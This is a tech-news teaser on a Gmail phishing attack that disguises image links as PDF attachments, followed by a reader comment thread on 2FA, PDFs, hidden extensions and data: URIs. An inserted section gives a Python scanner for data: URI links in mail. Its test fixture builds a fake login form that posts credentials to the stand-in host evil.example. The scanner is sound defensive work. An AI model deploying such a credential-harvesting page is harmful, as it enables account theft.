Brilliant phishing attack probes sent mail, sends fake attachments

A newly detected Gmail phishing attack sees criminals hack and then rifle through inboxes to target account owners' contacts with thoroughly convincing fake emails. The new attack uses the file names of sent attachments and applies those names to new attachments that appear to be PDFs but are actually images that, when …

  1. Anonymous South African Coward Bronze badge

    Already got 2FA enabled.

    But a bugger with 2FA is if you've forgotten your password... it is a pain to get back into your own account...

  2. Ken Moorhouse Silver badge

    can be saved by two factor authentication

    Except I suspect most people switch off TFA when they are on a pc that they trust.

    1. Anonymous Coward

      Re: can be saved by two factor authentication

      The fact is I don't trust Google having my phone number. That's why I no longer use Gmail either - nor do I use webmail to access my mail (except rarely, when no other option is available).

      1. MrT

        Re: can be saved by two factor authentication

        Sadly, others who have your number could already unknowingly have given it to Google by all sorts of ways, who then link it back to you via metadata...

        1. Anonymous Coward

          Re: can be saved by two factor authentication

          Probably, but at least they have to work harder (and I do my best to block tracking and pollute the metadata). And they can't scan my emails.

          Unluckily, you can do little for all those morons around you.

      2. phuzz Silver badge
        Alert

        Re: can be saved by two factor authentication

        All it takes is for one of your friends or family to have created a contact with your email and phone number, and bam, google/facebook/whoever will now get your phone number every time your friend clicks the "sure I'd love to give you full access to my address book!" button.

        So next time you think someone's a friendless loner, maybe they're just being security-conscious!

        1. Anonymous Coward

          Re: can be saved by two factor authentication

          "google/facebook/whoever will now get your phone number every time your friend clicks the "sure I'd love to give you full access to my address book!" button"

          Data mining's a bitch, ain't it?

          Frustratingly there are now plenty of apps - LinkedIn, Strava, FitBit, ... - which ask to scan your contacts list to see if you already have 'friends' on the service they can link you to - or, more likely, whom they can lure onto the service on the basis that you have joined.

          Many of these services incorporate Facebook and Gplus authentication, which means that even if you created your account directly with them as I do, your details have likely been shared with these mega corporations (known as 'carefully selected third parties' in the terms and conditions).

        2. Queasy Rider

          Re: a friendless loner

          Way back when, I never gave out personal info over the net, and yet, a decade ago I searched my name and there I was, loud and proud. I deduced, by various means, that the local phone co. had sold my info. Not long after that, I dropped my landline, and went with a PAYG mobile. Last week I googled myself again and noted with satisfaction that I had disappeared from the web. So you can imagine my surprise when YESTERDAY, I climbed into a friend's car and she handed me a photo and asked me if I knew anybody there; and there, staring me in the face were my sister-in-law, her 2 daughters, and grandchild. I was shocked, and asked how she got that pic. "Oh, I was surfing in the library, and I printed it out for free."

          "But how and where did you find that?"

          "Don't have a clue."

          Well, neither do I. She swears she never entered my name, and she has nothing in common with my sister-in-law who lives 2,000 km away.

          I guess I'm not so lonely anymore. Damned Facebook. And no, I don't have a Facebook account, but you can't tell all your extended family to leave you off the web.

          1. Muscleguy

            Re: a friendless loner

            More years ago than I can remember I ticked the box where our voter registration details are not searchable or sellable on the register. Yet there we both still are as someone has posted an old version of the register and we are still living here. Sigh.

      3. Adam JC

        Re: can be saved by two factor authentication

        Do you have an Android phone? If so, I got some bad news for you sunshine....

        1. Anonymous Coward

          Re: can be saved by two factor authentication

          Of course, I don't have any Android device....

      4. Anonymous Coward

        Re: can be saved by two factor authentication

        "The fact is I don't trust Google having my phone number. "

        I have three phone numbers. One of them has never been used for anything other than 2FA, using an elderly webOS phone that is used for nothing else (and wouldn't be much use because HP's servers are turned off.) One of them is for things like Microsoft installs, using my other old phone. And one of them is actually given out to people. But nowadays I'm trying to use Yubico where possible for 2FA.

        I regard PAYG SIMs as the cost of security.

  3. This post has been deleted by its author

    1. find users who cut cat tail

      Re: Sigh. Not again.

      > I don't use PDFs for personal reasons (they are essentially a picture

      Sorry, but this is wrong.

      You might come across some poorly created PDFs that are indeed a disorganised mess and no better than a picture. A reasonably structured PDF, however, allows not just extraction of all text (and the text makes sense) but can be imported into a vector graphics editor (again retaining the structure). If you edit PDFs in MS Paint you do not understand what PDF is -- it is *vector* graphics (plus some other bits).

      That said, if you want to send me text just send me plain text, not PDF. If you want to send me vector graphics send me an SVG, not PDF. And if you want to send me an MS DOC file just send me plain text because most likely you are ‘typographically challenged’ and the formatting will only hurt my eyes. But if you want to send me final formatted work intended for printing, yes, send me a PDF, not a JPEG inserted into PowerPoint. It is vector graphics so as a bonus I can extract text and images and make adjustments -- if the PDF was not created by a moron.

      1. Peter Gathercole Silver badge

        Re: Sigh. Not again.

        I don't know whether it's still true, but a PDF effectively used to be encapsulated PostScript, which allows very flexible device independent formatting, including embedded fonts, bitmaps and vector drawing capabilities.

        When it was first deployed, it used to be set up so that documents could be immutable, i.e. not changeable by the recipient, so that you could be sure that what you saw was what the creator wanted you to see.

        Of course, that did not suit everybody, so now PDFs are as editable as any other document format, and can even be used to produce forms that can be filled in and returned as a PDF.

        1. Vic

          Re: Sigh. Not again.

          When it was first deployed, it used to be set up so that documents could be immutable, i.e. not changeable by the recipient, so that you could be sure that what you saw was what the creator wanted you to see.

          Not really.

          There's a flag that says "please do not edit this file". That's the extent of your protection against edits...

          Vic.

      2. poohbear

        Re: Sigh. Not again.

        I got the impression that the original poster is blind (or has other vision problems), so all those downvotes are a bit harsh...

        FWIW there was a time way back when when Adobe, bless them, was going all out to make PDF the default format for the web, as opposed to HTML.

        Thankfully they lost that battle.

        1. Anonymous Coward

          Re: Sigh. Not again.

          Yeah, HTML + JavaScript is soooooo secure....

    2. agurney

      Re: Sigh. Not again.

      I use PDFs so I can control how my 'customers' see my documents. Having worked in the UK for various North American companies over the years I know what grief can be caused when trying to print US Letter documents on A4 paper, and vice versa.

    3. Anonymous Coward

      Re: Sigh. Not again.

      What you are _really_ complaining about is people sending binaries when they could send plain text. The rest of it was just a (self-righteous, ignorant) rant.

    4. Stuart Dole

      Re: Sigh. Not again.

      What the commenters miss here is that AC is a *blind person*. So yes, screen reading software for the visually impaired can choke badly on PDFs. Many of the PDFs I receive are actually pictures of a printed page, say captured with a scanner or phone camera. So they're really not editable... Find a visually impaired friend with a Braille computer or screen reader and ask them about PDFs.

      1. veti Silver badge

        Re: Sigh. Not again.

        If people are so clueless that they're scanning or photographing printed pages, then converting into a PDF that's just a big image file (per page), then yes, they deserve slapping.

        But most PDFs aren't created like that: they start out as Word (or similar) documents, and in that case the text can be read from them perfectly cleanly.

        I must say, it's a devilish clever attack. I've been thinking for years that the trouble with "security education" is, once it catches on, it's really pretty trivial for the phishers to up their game like this. And now they have.

        We need a new protocol, because email has been breaking for a long time now and this looks like the last straw.

        1. Phil W

          Re: Sigh. Not again.

          "If people are so clueless that they're scanning or photographing printed pages, then converting into a PDF"

          Unless of course you happen to work somewhere that operates a fleet of major brand MFDs which scan to email in PDF format (with an option for TIFF but that's not really better is it).

        2. Vic

          Re: Sigh. Not again.

          We need a new protocol, because email has been breaking for a long time now and this looks like the last straw.

          This isn't email breaking, this is an inherent problem with HTML.

          As with so many email-related risks, reading in plain text by default obviates this issue. If switching to HTML requires a positive action, the user should already be warned that strangeness might be around the next corner.

          But most people seem far more interested in shiny shiny than in security...

          Vic.

  4. Anonymous Coward

    This is why I never use webmail

    Webmail is so rife with dangers for the uninitiated it should be banned from use until the user has passed some sort of exam.

    Webmail makes users choose easy passwords so they can remember it when using a 3rd party PC, and because they CAN, they WILL use any PC that comes to hand, which risks (a) disclosure of logon details (not just keyloggers - one ill-advised click can get the logon details stored in the browser and cache) and (b) leaving behind attachments on that PC, typically in the %TEMP% area of the machine, something you don't fix with 2FA. It's a left over from the days of low bandwidth: documents would be downloaded in full first before you could open them, and the practice persists.

    Good webmail front ends make it possible to prevent access to attachments (leaving them only available for IMAP access), but in my experience they're rare.

    This specific attack is enabled by hiding extensions and actual link targets, unfortunately something that Apple now defaults to in OSX, sorry, macOS as much as Microsoft does.

    1. TWB

      Re: This is why I never use webmail

      'Webmail makes users choose easy passwords' - mine does not - it gives me a pain-in-the-arse-to-remember one and I cannot set it myself - but yes most webmail systems allow you to choose.

      My webmail is not provided by my ISP though...

      1. Anonymous Coward

        Re: This is why I never use webmail

        "'Webmail makes users choose easy passwords' - mine does not - it gives me a pain-in-the-arse-to-remember one and I cannot set it myself - but yes most webmail systems allow you to choose."

        I may have expressed that better. What I meant to say was that users often deliberately pick easy to remember passwords precisely because they use webmail a lot on non-owned computers. If they had IMAP access it would mean they'd have to enter the password once to set things up and you could enforce complexity a lot more easily, but webmail needs the details entering every time (when not on their own machine) and convenience still precedes security for most people. You can impose complexity, but then you just move the problem to the user carrying along a piece of paper.

        If users absolutely want webmail, 2FA ought to be mandatory.

    2. Anonymous Coward

      Re: This is why I never use webmail

      You can say that users choose easy passwords, but what if the password was remembered by the browser but never told to the user? In that case, the password could potentially be more secure... until we find out that the alternatives are also just as bad.

      In an office environment, if you don't or can't use webmail, you use Outlook. Guess what, Outlook (SMTP) downloads the attachment onto the PC and pretty much lets the user click on it quicker and easier. In addition, you won't get the hint from the blurry image but only the extension. What's the chance a typical user sees the title as legit and clicks on the attachment?

      There is no easy way to fix the incompetence.

  5. g00se
    WTF?

    Hide extensions for known file types

    The new attack uses the file names of sent attachments and applies that name into new attachments that appear to be PDFs but are actually images that, when clicked, send victims to phishing pages.

    Could this by any chance rely on the default (!) Explorer setting that is named in my title? If so, the fooled 'technical users' can't be that technical that they would want extensions hidden, quite apart from their using Windows in the first place ...

    1. Doctor Syntax Silver badge

      Re: Hide extensions for known file types

      That option should have been removed the moment it became clear what the dangers were.

      1. el_oscuro

        Re: Hide extensions for known file types

        The dangers of this option have been known for at least 20 years. Why it is still even a thing is beyond me.

    2. Keith Langmead

      Re: Hide extensions for known file types

      No, as I understand it there is no attachment, rather there's an image attached and displayed in the email. The image is designed to look the same as a normal Gmail attachment link, with the attachment name shown to be one you'd legitimately receive from that contact. So you click on what you think is a Gmail button but which is actually just a link, and get sent to the dodgy page.

      That said, I also think they should have binned the hide extensions default long, long ago, and I'm amazed it's remained the default even on the latest versions of Windows! In addition to the security issues, it's a support issue... I've seen so many people accidentally break their file associations and then not understand why they can't open certain docs. Un-hide extensions and you immediately see that no, it might have a PDF icon, but you're actually trying to open a docx file.

      1. Hargrove

        Re: Hide extensions for known file types

        I admit to being old and slow. Old enough to remember editing programs on the fly by punching in binary code on indicator/switches on the front panel of something the size of a (large) refrigerator.

        I appreciate that technology has changed. But some things should be fundamental. Like words should have meaning. Words like "Operating System."

        Classically, an operating system comprises the basic functions for managing the hardware resources required to store and retrieve data, and allow software to execute the instructions of the CPU.

        Explosive advances in hardware complexity and performance created a need for a hardware extraction layer. And things began to grow like Topsy, with applications being acquired and tacked on to "operating systems" like so many layers of barnacles. The resulting conglomeration requires constant patching and updates of Gbytes of code. The result is an internetworked global computing system--whose functional elements by the way include me and my computer, and billions of other users and devices. The configuration and functions at any level are unknown, and unknowable.

        Back in the day, if someone had described this I would have argued that such a system design was inherently insecure and un-securable, and that any expectation to the contrary was insanity.

        That's one thing that has not changed.

    3. Loud Speaker

      Re: Hide extensions for known file types

      Surely providing a means of hiding extensions is aiding and abetting crime, although presumably Microsoft would claim "Not guilty by reason of corporate insanity".

    4. Anonymous Coward

      Re: Hide extensions for known file types

      The issue here has nothing to do with Explorer, but with the data: URL scheme. The attachment never gets to your hard disk, it's a fake. When you attempt to open/download it, you get redirected to the fake Google login. You'll never leave the browser.

      AFAIK, it will work on any OS, with any browser supporting the data: scheme.

      This is an attack aimed at stealing Gmail credentials (and then probably download user data before using it to mount new attacks).
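The two comments above (Keith Langmead's description of the image styled to look like a Gmail attachment link, and the Anonymous Coward's point that the link target is a data: URI rendered entirely inside the browser) describe something a mail gateway or a client-side filter can check for. What follows is an added example, not code from the article or from any of the commenters: a small stdlib-only Python scanner that walks the HTML body of a message and flags anchors whose href is a data: (or javascript:) URI, decodes data:text/html payloads to look for a login form, and notes when such a link wraps an image, which is the "fake attachment chip" pattern. The sample message is constructed here for the example; the real Gmail chip markup is not reproduced, and the function names, the constructed URLs (evil.example) and the "form/password" heuristic are the author's own assumptions.

```python
import base64
from html.parser import HTMLParser
from urllib.parse import unquote


class _LinkScanner(HTMLParser):
    """Collect every <a> element with its href and whether it wraps an <img>."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._current = None  # the <a> we are currently inside, if any

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a":
            self._current = {"href": attrs.get("href") or "", "wraps_image": False, "alt": None}
        elif tag == "img" and self._current is not None:
            # An image inside a link: this is how the fake attachment chip is built.
            self._current["wraps_image"] = True
            self._current["alt"] = attrs.get("alt")

    def handle_endtag(self, tag):
        if tag == "a" and self._current is not None:
            self.links.append(self._current)
            self._current = None


def decode_data_uri(href):
    """Return (mediatype, decoded payload text) for a data: URI, or None otherwise.

    RFC 2397 shape: data:[<mediatype>][;base64],<payload>. A missing mediatype
    means text/plain. Malformed base64 is treated as an empty payload rather
    than raising, so one bad link cannot abort the scan.
    """
    if not href.lower().startswith("data:"):
        return None
    header, sep, payload = href[5:].partition(",")
    if not sep:
        return (header.lower(), "")
    params = header.split(";")
    mediatype = (params[0] or "text/plain").lower()
    if "base64" in (p.lower() for p in params[1:]):
        try:
            raw = base64.b64decode(payload + "=" * (-len(payload) % 4))
        except (ValueError, base64.binascii.Error):
            raw = b""
        return (mediatype, raw.decode("utf-8", "replace"))
    return (mediatype, unquote(payload))


def find_fake_attachment_links(html_body):
    """Scan an HTML mail body and return a list of suspicious links with reasons."""
    scanner = _LinkScanner()
    scanner.feed(html_body)
    findings = []
    for link in scanner.links:
        href = link["href"].strip()
        scheme = href.split(":", 1)[0].lower() if ":" in href else ""
        reasons = []
        if scheme == "javascript":
            reasons.append("javascript: link")
        decoded = decode_data_uri(href)
        if decoded is not None:
            mediatype, text = decoded
            if mediatype in ("text/html", "application/xhtml+xml"):
                # The whole phishing page travels inside the link: nothing is fetched,
                # so URL reputation and download scanning never see it.
                reasons.append("data: URI renders an HTML document in the browser")
                lowered = text.lower()
                if "<form" in lowered or "password" in lowered:
                    reasons.append("embedded document contains a form or password field")
            elif not mediatype.startswith("image/"):
                reasons.append("data: URI of type " + mediatype)
        if reasons and link["wraps_image"]:
            reasons.append("link is disguised as an image (looks like an attachment chip)")
        if reasons:
            findings.append({"href": href[:60], "alt": link["alt"], "reasons": reasons})
    return findings


# Constructed sample message (not a real phishing mail). The first chip is a
# genuine-looking https attachment link; the second is the trick from the
# thread: a PDF-looking image wrapped in a link to a base64 data:text/html page
# carrying a credential form; the third is the same page, percent-encoded.
FAKE_LOGIN_PAGE = (
    '<html><body><form action="https://evil.example/collect">'
    '<input name="Email"><input name="Passwd" type="password"></form></body></html>'
)
SAMPLE_HTML = (
    "<p>Hi, here is the doc we discussed.</p>\n"
    '<a href="https://mail.example.com/attachment/123?view=att">'
    '<img src="cid:chip1" alt="Strategy_2017.pdf"></a>\n'
    '<a href="data:text/html;base64,'
    + base64.b64encode(FAKE_LOGIN_PAGE.encode()).decode()
    + '"><img src="cid:chip2" alt="Q3_Budget.pdf"></a>\n'
    '<a href="data:text/html,%3Cform%20action%3D%22https%3A%2F%2Fevil.example%2F%22%3E%3C%2Fform%3E">'
    "click</a>\n"
)

if __name__ == "__main__":
    for finding in find_fake_attachment_links(SAMPLE_HTML):
        print(finding["alt"] or finding["href"], "->", "; ".join(finding["reasons"]))
```

Run as a script it reports the two data: links and leaves the https attachment link alone. The "form/password" string match is a deliberately crude heuristic and will miss obfuscated pages; the stronger signal, which needs no decoding at all, is simply that an anchor in a mail body points at data:text/html, something legitimate mail has no reason to do.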

  6. wyatt

    I've experienced this, my wife received an email from a known source with the picture. We questioned the company who sent us this and I suspect they've been compromised by it already.

    When you run your mouse over the picture you can see it isn't a PDF and a URL comes up, clever method I have to say.

  7. Shaha Alam

    any document with 'strategy' in the title should be immediately deleted to avoid frustration and mental anguish.

    now, what's all this talk about exploits in dodgy attachments?

  8. Potemkine Silver badge

    Amber

    Won't someone think of the daltonians?

    1. Destroy All Monsters Silver badge

      Re: Amber

      On the Internet, nobody knows that you are a dog....

  9. Baldrickk

    TomScott

    If that TomScott is the one I think he is (can't check at work), having known him from my Uni days, he's a gadget geek at most, I wouldn't call him a technical expert. Great guy though!

  10. David Nash Silver badge
    FAIL

    not-really-attachments

    I've occasionally received emails claiming to have "attachments" but which were actually links to documents on the sender's email system. Nothing dodgy (in the malware sense) in this case but not a nice way to do it, and I don't trust it at all. In my case I recall they may have been unsolicited CVs from a recruitment agent so draw your own conclusions!

  11. cd

    That guy always wants to color-code things, that's his solution in Wordfence. However, often the color-coding is incorrect and actually makes Wordfence a little harder to use.

    Given how AI is at sorting, I think a simpler solution is for Google to block linked images. They can be separate but not together. Also, this config could be easily added to a spam filter from their side. If their brains can't do it, why am I not working for them?
